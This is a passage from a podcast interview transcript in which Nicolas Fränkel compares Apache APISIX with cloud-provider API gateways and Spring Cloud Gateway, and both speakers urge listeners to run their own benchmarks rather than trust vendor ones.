Chris Engelbert: Before we come to the last question, which is something I always have to ask people, maybe a quick comparison to other products. There are a lot of API gateways, at least in air quotes on the market. Why is APISIX special?

Nicolas Fränkel: First, every cloud provider comes with its own API gateway. My feeling is that all of them are much better integrated, much more limited in features. Again, if it suits you, then use them. That’s fine. If you find yourself at some point, you need to find workarounds, then perhaps it’s time to move away from them. Then about the comparison, the only really in-depth comparison I’ve done so far is with the Spring Cloud API gateway. I have written a blog post, but in short, if you are a developer team using Spring, knowing Spring, then use the Spring Cloud API gateway. It will be fine. If you want an Ops team to operate it, then probably it won’t be that great. The basic level, you can do a lot with YAML, and then you find yourself needing to write Java code. Ops people, I’m sorry, but they are not experts in writing Java code. You don’t want to have a compile phase.

Anyway, if you are a team, as I mentioned before, if you are a team, you manage your own domain, you have only developers or DevOps people, you are familiar with Java, you are expert in Spring, you want to only manage your own stuff, then perhaps it could be a very good gateway for your needs. Otherwise, I’m not sure it’s a great idea. Regarding the others, I honestly have no clue what’s the pros and the cons compared to Apache APISIX, but I know that Apache APISIX is the only truly open source project, the only one managed by the Apache Foundation. If you care about open source, not because you love open source so much, but you care about the future of the project, you care about long-term maintainability of the project, then it’s our main benefit. I won’t talk about performance or whatever, because, again, I didn’t do any benchmark myself, and every benchmark that is provided by any vendor can probably be discarded out of the box directly, because you should do your own benchmark in your own infrastructure.

Chris Engelbert: Yeah. I couldn’t have said that any better. It’s something that I keep telling people when they ask, whatever company you work for, there’s always people asking for benchmarks, and it’s always like, don’t believe benchmarks. Even if a vendor is really honest and tries to do meaningful benchmarks, it’s always an artificial dataset or whatever. Run your own benchmarks, do it with your own datasets, operational behavior and figure it out yourself. We can help you but you just don’t want to believe your benchmarks or not.

Nicolas Fränkel: Right. Exactly.

Chris Engelbert: Alright. Ok. So we’re coming to the end of our episode. And something that I always ask everybody is if there’s one thing that you think people should take away from our conversation today, what would that be?

Nicolas Fränkel: I think the most important thing is that regardless of the project or the tool that you choose, that you choose it for the right reasons. As I mentioned, if you’re using a cloud provider and if it suits your needs, then use it. If it doesn’t suit your needs, if it’s too limited, then don’t hesitate to move away. The good thing with the cloud is that you’re not stuck, right? And if you want a product that is focused on open source, and if you are in the open source space, I think Apache APISIX is a very good solution. And yeah, that’s it. Always make choices that fit your needs. And it’s good that you don’t have just one choice, right? You have a couple of them.

Chris Engelbert: That’s really well said. All right, so thank you very much, Nicolas, for being on the show. It was great having you.

Nicolas Fränkel: Thank you.

The post Improve Security with API Gateways, Nicolas Fränkel appeared first on simplyblock.

]]>
undefined